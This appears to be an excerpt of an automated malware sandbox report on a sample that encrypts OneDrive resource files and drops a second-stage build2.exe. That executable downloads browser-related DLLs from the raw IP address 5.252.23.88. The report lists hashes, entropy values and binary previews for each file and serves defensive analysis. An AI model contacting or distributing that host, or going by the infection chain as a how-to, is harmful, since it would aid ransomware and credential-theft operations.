Preview:	.PNG....&..D.%........0U..M..OE......4K.)/9rLfm.]z..'.(o......f..{...m6.5.{.j..U...1...B........>.....^..1.;..X.....bj~..q..z"F..Rc!.<a.;.s.............O...0....P.<.b.v......Lo.4..#gS.sm..y;4.((%...V.<......s..........?#..H...Q3...({D..%.MI...B'AA....E./T.Z9.w%@B.I.....Z9..D.x....u(.\....6W....6....A...R....*X........ntG.<....nE@.......S.P.LU.5y.....iD.-.1...?%)..0..Y..~,y.W....i.Vxb"..h....K.&........j.....,.TP...91..m...\|&4...oEb......e../..N.4..G.D._.5`..<B.........Q.~..G..._I`..m.....I.\.8:....?.R....c....Lj.V0..+...\|K..+.b..oB..........#OW..../hR..G.m.e.J=?...;/.1.T..\.]....f....tb....Q.}.i.O..^..c9\|5F..Fe.....6.l......8.gs..m.^.9$...7H.a..ei....e...2.G.).8.G. .s&..q.....S.y.U'......~.?.X.N}....K\|n..."7..=...=.M..ir.a3.5Q....'.o}^...N._.Uu.J.P..y...e....$z.5..t..].Ls..59.......:.......0i8o.F..U.}0qg.X....f..+W.......L../5.BA......'.e.......mx..C..q.$.\|n.....>.}....\^..`8......)..@..E.''...U.M. .......LA..L..3.....R..Ei.+.<....,VS.....p.EI

C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1324
Entropy (8bit):	7.855496489365916
Encrypted:	false
SSDEEP:	24:rzvN7Of5nOMYW8HjRPBxStxZYnjdCrtOZhqBoDDR8WFbD:rz5OxYNhStxZYgtWR8WVD
MD5:	0DEE922604BC016D2F0E71F7AE650006
SHA1:	85D02E7C7C285CC337B386C6662833578D4BCB00
SHA-256:	292B7A7911B7E10AC647646DF1C978F1039FB27DABBABAAD8544DECDC86D4D75
SHA-512:	A821A89F8996E31932833515D9196B9916AA96320DDFCD373B02DD8ACCBA7F3FAA4FEB83263443221204E41EC870A02047D93FCAFCE7EDF89D1E72EC38C82AE7
Malicious:	false
Reputation:	unknown
Preview:	.PNG.$<.c.f.......C...W,....\|.'.5....m.....i.?...~R..a.4........A..8G#...+.8.}[..b.Ao....4..{...ao......$..&..=5.C....)....r.i.XO....G.".....n.YWv.....9..NN....VUIr..Z."T..........r.+M..........\|R.^j...<.b..#....=g<...m.T...#1..{./....\._.:.U..,<....Ge...'.X.o]9D<.WH.m.CBY.}O....)..D..5.`S.O.H.>rJ.#.c.....>.$(...!M....E.J....)Q.........9h.4.Zrf+d......Q.......5.......'...[..., U.^&...l9.x.....'....W.@...e.Z{.#...5..).~(/[..c.T.:...QJ..K31-.\|...Dj...4I/&H.M.y.Lg.......2u..2..Z~b...0H7U?....\Q(.F...._.../M.I..Zs...FC.Q.a9..V2-RU..zQ.......9..?a.8...{.......$O.l...W..6v..s^..#....'q_..T.....=..n.~8.i.,..z.n..E9Ziy.p.....ZXim).i,lk.0"7E..#k...B.......>=r........f...X..mKn....3..F.."..qgd.5.W...........hj.5..0\..kw.F...+.Y....R.eV.J..+.S..y......Z..f....H...G......`PF..Bn..B6s....p.^..SYl.#N......H....u.:.bT.F..X.....<./...Q..........2....)..}..l...."Q.N..J.p.sUO..S.......B.jN..^...V......c&..-.o...2 .p.P...t.)..*T#..~.C.N.E.g...2.

C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1726
Entropy (8bit):	7.892195462160448
Encrypted:	false
SSDEEP:	48:FQuzLrhCxfd3NZR1MOFyQIF3KUvy9ObbxJWVD:brO9ZYOF/IdKUUObbA
MD5:	5C221394C15863ECA24D434B8E6C1BA0
SHA1:	C7404270FD3826C38031E5538C91EFA850E63B9D
SHA-256:	E7E3BA19B1D1F2C8C7AE2D04C3E54BD07AE078AD4F8957B6B381D20EBCEE92C2
SHA-512:	D77F70FD132452670FDEE01B3C7E3DB65F89DAEDF3198D75C42FBE33C158C490AA1139D1DAEFE4BFD380C1ED5C64EBA1E2423A65F3E80F87C14F82A96F00054C
Malicious:	false
Reputation:	unknown
Preview:	.PNG.QK.5.s.<+...q.K.}.....C..H.tx..%.P..._.n..m.`j.#\......'w{>..\G.....Rq.....x...`...qv.}.?....A.w..:..$.<.}.$............<O.5..@._......&.-ge......}M[...`g3<(K....@......r.^............~.C4.Z..f..@.x"....z.'.^fM.B...`......=......?.......W.>.<.......I...e.....5..,d......f..5....3./..H.r.9y..9..i..Sf...>.K...P.".<..Crg..hz...4..f\|.LK..U.&.?v.....2....t..h...=.....Z.j* .BYbP@H.a....:E.......G,.N .!!H*...T.>I:d.R.. E.c....H#K.......`..?j...&%..o.o34I....T.H:.2.2_d.....Rg.r.dy..D...3"..[?].}...FK]H.Fs..f)=..T....'._...9...b....o..-.Gn...p.~../O..,...i.'.l.....u...;.fK9.cn=...4.....Z.M.Vy......W.G.#M..W.m.Iu.......S.TE.K...HZwn.7...O....r.s...[.;.oQ.J..&0.....Q.......%.?.t.{..yk....).........r<.2,..R.$C.F..a(.t'.`...(.N.D).h-.........W..9{F.6..q..uOK..@_.x...O.....r.p......I..n.3....it.q...j....b.h..(J...y$Z!..C....z2.)-.^-..KF.@\t.plk.Dz.p.._/0>P.Sh.>ICG.Wz.........n..pB..../;....e...(....>h\...K. ..0,. .^...}.5...L.d..,.K.?..<.^".

C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	3560
Entropy (8bit):	7.944996949915787
Encrypted:	false
SSDEEP:	96:FjXDJ3EN3olxpcrxOy15E++tLUK+hsA/4YOHS0oy3:FbNEwHI1+++tYSA/lOH9ok
MD5:	649F2AD388D8CD39027D1A9FBB873635
SHA1:	A4FC03C5ED61A8AE32C02981D417A72196B75F6A
SHA-256:	F4A8DD1685C9E710A151B057BBFF848879C0034648319A8AD89254610CFDDFF9
SHA-512:	1175F1076C0B7711EE72B0636BE1D230AEB1A21E6938EA7BC1E31367AD0AF6CD7B3EBB787287712B59F262E0A7E0DE0178DF23EF60C240CBA791CC1BDE667AAC
Malicious:	false
Reputation:	unknown
Preview:	.PNG.w.b.a../.@'tU.?.5y{8...yN....H8.4HZ........'.uG...:38..v&..=gA)8.....;..K...Ai.z...x(.Y+..r.._~....'E.2FE...5.)0.sF..t........r...ch.kT......Z.X..b4.v.,(..%.d'UN..e.1.1.85.'.D.`.wv{7#..-...Q1...C..b...Y.......[~.P!..)X(...Y...dP. 8...O\.g~2..T}W.....A'.o7F]Wa]&N7.8N.8b$.=..2.].X{.9.9&..7.;G'.!(..,.]........Z.K.i...O..? ...... ..[<8."p..X2g".G....>.8jq.3.;...>I5..oRR.........z.M.[i`.h.r..D....e...i..qmwm.....t.5...'.&.Abn.nr...}?.3N,..@..m..ZgG8%.(.N.. .J....5......=P...Y..6,.S...9.C.q.:.y...[.U....a....C..c.?...vq.w(.oWN.......$..kV.....5eA..O;....WR....<./..O..R..8..>!.{.tN.......DS..37..C...W.e..l...\|.J{. ...y....o9A.@`....._.....#....Q>.aK.~.."\|Wk<8Uw..;...K....7P.....1`Xd......j.$wo.b/u.W.....;_.u....*......eS.._h$...X..m.\...!.<E.d$.U...9..nS..!]...:.......z.Da.[.....&A=\..h.D...C.J/i0...Dt\|..+"nhb.'^OX.JG\.../...N.g.7...I...9...M,Y...Dd.$Ol4.p....`.{j-.w..%.f`..,b.h,......J;..r....dQ..\|....O.$)....F%....(e.z...AG4uN,b.r..]..3T..@...

C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	996
Entropy (8bit):	7.761701754109818
Encrypted:	false
SSDEEP:	24:EEACf5E9MRk80X0GRtmzypb3OixGrqk7OWFbD:6g5EZ8+0GRUypb7Ymk7OWVD
MD5:	8470006E3386C33CB7162EBFD0AC0E39
SHA1:	B4DBE4F5BB4C319E735ABB63DFAE261D5DFC1BF8
SHA-256:	95DF2816A68EDBD40EF155C1A4EA8B97C62145E10F9922D6B979DA9150A0F604
SHA-512:	05C4177412B12693F1F607E90DC57A849EE8E855C381466A427F4E6B94B5E0ED9837A320591CA22F56951AC0CD7566C9FC140A95FAD8D380BD10786D5E57EC54
Malicious:	false
Reputation:	unknown
Preview:	.PNG.?2...@X..9..O...(>lT.......6...3..!.y.Is.\|w4^.(..;..od=S..........[~2yRWB.4.)S3....,b...N...eP..:.....v........l.:.s.D...g..0..#T.^.m..#`.`?...!.......".....+\.r. k.gk.....A......;..P,;.N.n`ucrZ....%B....+\.s..5`...].$..^./.G.%N..[.e....us2v.`..&.5;2.3?.As.P.{@.\F.9W.jJ...g.]...\|.o2.p~qL!\|l.(...U...QJR5N...#...sk..eyYL.W...o...p....%@...@.].+...M.G^.g..<a.......\|.AK.<..<.f...8........p..pHJ.w.P=.m.......".4.F. ..%.......k.N.n.2'..?N...5O..-.....wy.r8+.3......+.,Oq......4.....*...>.X...vo..E...[<\|:...+.M-~......uF..b.......Q....'z./R&.QH.:&Sgk\|..2......E.._.{..+.o/. ,......q.=v..1....s.y8....T.PjG......(....d)Q.;.6......v.....0....k.....$.R...[.M..7&;.....8..D....o ...F.p@&..{...m&.n)e...1.'0...3\|.....=d.z:....P.....w.}..k.}..%8;.#E..=..\|.e...r...v..L..r.<{..p.[.u.[...7..@KP_...L.^.}.._....hY...%cY<.E..<=....C..b.=.q~.V........%..@d.....9...$.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	7.821071620487136
Encrypted:	false
SSDEEP:	24:n3ISFOiiCgNoYsAqAmTAXX3pdewg9W0WFbD:n3ISFOiiC2o1cXX5Dg9W0WVD
MD5:	B2DB48CA3A48EFF3B3FB742EB6158762
SHA1:	24E9B2FB8C1A5B5AEECA16BA22B72E18CE1A5222
SHA-256:	882FC406B0AE80B17E8B09F4ED34D1618B08587E30CC85E81F3DA7A0A56F6485
SHA-512:	18179ECEAEB065C8D5BD65EAB160801B9BCEC701787280650E18C6126AF648040AD1A20BE5D7F6B812D0E159C99AF6D4D55394F90A33EBF1D30C0B0063B9D338
Malicious:	false
Reputation:	unknown
Preview:	.PNG.....c.......s....$Jv.r.b.L:Hgt..-......X...'..[.+H..l._......(.'.7...Nte.\|...c..d..?...&.@-...r.B...h..s.h.W..`..$9.....>.t.{.........4..a.......1..8i.'.#H\|z.[.)..I..x.p.O.H:.`<`^J}...Ow..Y..}1tr.!J...1ON.Q.....vQ..w.p.Vh...+_.......r..SZ........gC.g....S.e..{ .U...."U.)..#.[E5N.3..;........x..>......2J.}:B....^".9.Q..'.%=..(.f.&...C"..A..>E..g..P.........o.....O....~..e..I..;..[`.t..........).)X.L@J........r.`...^mv$.........`.......0..;zUt....QO.K...F=......T..%.]......c...3..5......[.O.."\|.M .-.0.=.).."...@..Gw}_.......O..).X4.=.A.92.....3_.qj<..P[^.ue.. ..4....Q.j......8r.Ea...j"....1.....c.s...CK..E.n.B.)XX...C....O..n...B..r....w..OT.s..]<.ET.6.H.....s"...@;R.".....C(.\....^E...O.).44;.O.i...6...t..p.$=O.;jt...V.l{.[#.........O..g..2!....~e....)S..J.;.J.m...[.<1hs..............\..vX.M.rF..S...Hr..c...`L^..H97.6....q.f....&+3Z....N..mz,8...$.d..1..].....A..#.Q.*T]..U....^.O.. `W..`_.D%H{....,.......K..N.F.?........X.p..O.!Gp.c.#

C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1134
Entropy (8bit):	7.79406232072888
Encrypted:	false
SSDEEP:	24:GJU3N7VYDTS/1BqYgzLIUn/WKYSeADH5K9o1Alv4SoySC4WFbD:GJlPmMYgzLIirZDZKYAHSC4WVD
MD5:	A05AB555E25A78FDA1E97C30A1FDD354
SHA1:	2922C18C6CC6B09B72D82EFCC7987F673285FCDD
SHA-256:	B9A4C928745CEF04BA5434E88F6EEA88E600981BB28F3F8BCC8DF2EAEAFABE26
SHA-512:	7F510C715B72A8E12D22C24152810134C3760A5B42A4273A9080755678ACD465BD7C6C266A2878FA91B55412750AB44F56A2B1FEC0F0E22877E0E0457101952A
Malicious:	false
Reputation:	unknown
Preview:	.PNG.....P...%z9.....rNu...v.`...`yTm}.......-J..)[608.,..H<..!wMR.;]........'......f.!.t.8<..R...5.:U_b.u.4..X.!`.m5s.E...Px....;...m..X..(...o1.....0....4.pq.....f..Du...].m.&..Dv..........,.ge.....c[%.'.-.r..y7.R$..0.n....h...&'1u..j.T.L.83..8....h(M.@f`.l>....o.b..v.XZ.R. ....B...}..O.m..\|+..M....V..Vq....m..BlZ.4[Y2...7...;....C>23.PB.XM?.c-....c....5M0....\Q..^1.r.S...N......+Z...,.....0.?.EB. x..D.O.xP..4..k-H.... ..V.%.^KR....'i.J..D....&+....`V.)./..,wP..4....y.lQ.........9....2.=fw..j..F3..H.....-.^@.......rn...5.......;..r..u.B-.1.2<o.Uur..D-.m3.~'...X.0.=..m.1qR.5..z.UT.R..B]..y%^`...z........:7i...'y?..j.i..q......D.;..!..N...\KM....wb.....~....3D...T...t....J.6I.I.^...:...`9../..s3]%BhU'.w/....,..=.....S..`............J.Y.........R..O....ZL..]..d...(.. .,+R...Mb ..j....Yk.{..,.m.[./@..f.......>.K..@.h...g...>.YG..orv.W..."#;...}P.........._.....\|.....IB`\|.....P.u.j% 5ij...]\|H...gO.q.UR....].Zz.w..\.;$.1..fe...~.......#WF.........

C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	modified
Size (bytes):	1827
Entropy (8bit):	7.89527404978357
Encrypted:	false
SSDEEP:	48:YWHmJ2kzIA61kEVlWhozKGnq2J2upiSkADRZTkWVD:YWHmJ2kcA6juhomGnXJdkg7l
MD5:	B196115A99926232AF8FE6BA4A03C63B
SHA1:	61E863DA553C11BF4AB5BB6228CAABF23C639B3D
SHA-256:	DB6B105F9D482384DC0714F12E23C19F82887D18E7988724AB3D7731D72095DA
SHA-512:	56FAFA24EEBCE3AC0AB931B1E04374A3E07D7B598105CD0F1DA2B36182169440030511BFE593E1232561AFA92AA0E17D43287F470FD9B5011B332BC580B24BF3
Malicious:	false
Reputation:	unknown
Preview:	.PNG...$...Y.bZ...]...#.E.ALP..+.Em..b.l......uc].W.0H..I.r=T..h.>.;j....D.SRI\.R.o..#w$k...P^..).6...^^.].:.... ....Nu..\[..Yg.....#...@[".[.FM.....ME..L......&y.. b..#@B.V.B}M...........7$.S.>..S..z...j.....O...]....'........$QT."9.:.Ei.<.....2j.U.S1.....6?0...~....n.U.Q._8../.tD#q.r..]...!o....U.9.=..qb....{.wyF.0....J....c......I...o..._...o....$......n.[3.p.B...x.1.Z..(J......+.........ZZ.p....s..=....ag.g..:$..\...Eo3.Hpa.bd.........W.#..K..q......@0.<@.z.U.6..\|.....FF.6........Jv[(..#....#..'....L+.g!.\.Qu....CBz....Z....SC.........D.Q.?...+%......!......u.F,./....^,...`M........z.o+<.......r.(.c....}.../...z. n...-.:.d6..e.Y<..F..-..i.(....y*.x..(C.6.p.@?.;......Y........,.7$$...t..sHN.l.."[...)W.;H..W.g\..4A..z...p..s..".....BJa.........J.].&.J{..[......4.V.8.ml.J..`.C..1l..\zY..M..F{..R........Fm5....r}..p...B.....w.a.R.....c........4....B..v..<X1s..BGN....#...E..h..N.u?S....>1>....&;.I=..T.7.....R.9y..\|3.....H..rrw...Vn5..(...\|

C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	678
Entropy (8bit):	7.634646485436081
Encrypted:	false
SSDEEP:	12:0ixphJolklKOSFlDEgCa0//SMg2BIRqMeBZ+XbpAl6Dj6Z3cii9a:pPJXpSqn/SMVGqUtAeWFbD
MD5:	DE9996C30E09C9AB784C309A4789BE1B
SHA1:	5DBC1E79BA5459613A4D95B7454A40C7F5AA6646
SHA-256:	4F807AE119AB27012754B3E155EF9E8CC4430C1914CE3A0175F58DF7EB924567
SHA-512:	FCAAA704524426B966A40D0FE674436F4AB2F5B039EBEEC1EDE2345153EF3147F127708A699339B1E0BA1431860D90941B8758CFC4D0B5F5C2E2E56D2A7B8C4B
Malicious:	false
Reputation:	unknown
Preview:	<?xmlHI.2}.JG7..\.....q.).q..c.N.xm...D<{..O.J?`....C..y....8p.ia.\|.....}@d`.o[.Vp!...p..e..T...a&....`.R...b.......+=.<....Z......V...C.. (k..N.CA...3.....- .x8N-f@.Jo..b..Zv2..F..H..DB2@.E&{T.....V..... ./^...#Y.v{....,.cr.9..C.s..~.j.9.I....1.V....W>.....K.... .Np\|.qB.."..\|....yim1l.U&...'..P.....j......<....evD..0..T..6...D....[/.P.pX..._u!.....D)..(.....g[o.`.7.;E....?.v..x.L}."..yZ,.j&..?M=;...A[\|0dR-.*..;.......X..G.....7& .0.P.v......'.)q..&.d>c.....Z.C......#.a...$..2.>J.c.`Sif...K..c.B.Y,V...gj.d.Rc.1.q.i_....@.".lq.q...5^.E..Y\..{!...`+v.....Y...^v J.......xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\Resources.pri

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	4750
Entropy (8bit):	7.961402099431523
Encrypted:	false
SSDEEP:	96:WQ+TFKFRZNMdy1oSUta5/8PTrHYQQSYyEc4rfgnJPq5Jbaa12+3:WQaKZNMdy1o+IH4Q8gnJi5tl
MD5:	4C7B8422B130399AA2F35CC29BAC8B47
SHA1:	BA281F7B9E5D9BE473AF4458A16B38CD34B57280
SHA-256:	11CD03F3AC4A61AB03C5F28FFDD4D4C88FB184341D4781FB3E132EBE02A91D0A
SHA-512:	670DB10C459B57436B659BEA8A5B5349037B0D30488DF738388F457CF22287B25211188F4192C607E4315C102AAA7A6A561AFF5A41E6092A32192216C4003A28
Malicious:	false
Reputation:	unknown
Preview:	mrm_p7Q\|...T[.i...Riqy..nH.L..O.b50.......w.I....U6v.PiG.`SX#,....q..X.n.R...,......b..`...J.6.8 ....l..3T..8g.j....7;.......D,Rq.x.2..:.a...S.<(!.h.XPvD..j<..8...f.n#H.#V`.z..\$a. ....F..-....-.(t.e...&[.Y....%.0b.L..<.j.?xX._.&tY.v8.3V..;.5..D..W`>#.sfQ...C.^FQ.......toy...t?o...W.\7.BE..[RA.....''..4.......N.."'WX.Z...K.V.TT...:.B.).2...z...d..U...r<t}..'...n"...Kk]`.WA=.....b.#.A#y/........."....l......k.F.b.~.t"e.tu..oz...U..$t..+.W.Qzx(.@..M..i>E.....c..I...x...ml.fM.p.O.....&.'7=.vu.N....>k.<.=...3}...3.z4..g..>.R.A.A..p.?i...z.!U<l..3a.....YC.....2.,.P,._.....M..........4...c.7......2.....NA...{....[.W).\|._...l.i$C.A<...s.k...L....Q.1.2..xoo..Z...&B.c]5e).....5%....x...{..b.Vn(._.d3?...7...$.~.E....."B.@......zE...cq...a.k......A..f8..(......:..=....h.ky.u.L.Fb...U._.k.?..t...I3b..?Y!w....#.....<J..~........;..=..;j.X.... .yz..33.Ab..S}......;R..%M.\|.t^[.B..C.<]G;.!.wt.F...{....x.7.............R!#\|.w<...(..5.,&.N....%.......Bi>.

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1318
Entropy (8bit):	7.84630126656684
Encrypted:	false
SSDEEP:	24:YPcNNkLVs79cedmpb2Orn2Szoaxs0ANGSsGvEsZbtNA6zo9mQusWFbD:YPEGs7Xl6Ri0bHDsJzA6zRsWVD
MD5:	79309DA21345A679F9D1212B65492348
SHA1:	02ED06F88FB92D0178AB4C12CFF70972860E620E
SHA-256:	BD774FF7759856638C959A8C7741257CF10FDAA28DDD0FE35A261A2390CD2E08
SHA-512:	6E818F41AAC7E397DC9D69250047BFE7B0EC0A9DD3B3F71E06985C666898C780E3B855D00EFC426DC6B0BCD518D0569063D87FB746184F473A16D5EB08C857A2
Malicious:	false
Reputation:	unknown
Preview:	{"Recj..P.....oI...\....)...G..I...7.Q.4..._-fsU....@.9Sb..._...M.....7"N.Yyp..?.2T.".t.rR#+UG....."..s......T...tY.....u.....1...c9.2+.A..D.0c..C.r...Lb'J..{...t(y2...K. s#S ..t.9Y&x...@.S.?....O.X........<:....0.SK.+W&V....M...^..."U.0...[.{YTG'..:hW..-..`.]...X......Y?...G..&e......2F...Z..6..2...i.='.k.=...........dB.J+&#...ku...A.(...`.N...t7..1._.P...z.E.xr..Mu"....?..:[\?..-4...Cl=.ersk...S.....s{v....b.4f.Jb....L....k..l..g.-........_....r..~..b..b.j....o..i.a.<..}../.....8....X?..d....[1........`.aly;......\~.X0...N1.......?9y.E)U6R?!....0.`..'.........5Q...k..$-.g.....(.H..........*.M...wXo.[%P.9.].5.I!...Q...h..i..c..%b..m..d_.x..jM.......e.oO.f.....~.iY.......e._U.w/...W.....(]_...$.0..#^.8..+.`.7F`..@.]..=\|.U2.p..:...<.N$.....-...........J....96............/..&.Y..CO']...=.<....e....^Z.HI..74O2L....h.%.N#.j.....=.x.#...tu]...\jV....K.....D...>...L..@..zg......ry..Z.%Q.t.E...~...H^..&...M$Uc{.W`..5.r.&_....5gt......U

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
IE Cache URL:	http://5.252.23.88/mozglue.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
IE Cache URL:	http://5.252.23.88/vcruntime140.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Reputation:	unknown
IE Cache URL:	http://5.252.23.88/msvcp140.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\build2[1].exe

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	631808
Entropy (8bit):	7.618829663475189
Encrypted:	false
SSDEEP:	12288:QYR5FKXNTD0ZDOGJivgdrvEY2VBEN7AXlSvpqDFo:QWFyDMiGEFEHvpaFo
MD5:	1B28A890F243870FE2292DB97E0DC6A8
SHA1:	D8B96C8545B34E29E371A189694CEB0D3757AC28
SHA-256:	11587581475665EF687E599105D575955833613E6E57D3D120AEAD70CDDB0918
SHA-512:	BEFA1CC57B4C53254B5C5381BD632C03A0A60DAD1AD1CCF94F407E07AED4574824AC2BADBCCFCCFDE521D876BCA705374121FB6CFC6BA74D2CE394130C9ADE80
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L7...V...V...V....\..V....J.zV../....V...V...V....M.2V....]..V....X..V..Rich.V..........................PE..L...m<._............................@.............@..........................`.......G......................................0...<......................................................................@............................................text............................... ..`.data...@...........................@....rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Reputation:	unknown
IE Cache URL:	http://5.252.23.88/freebl3.dll
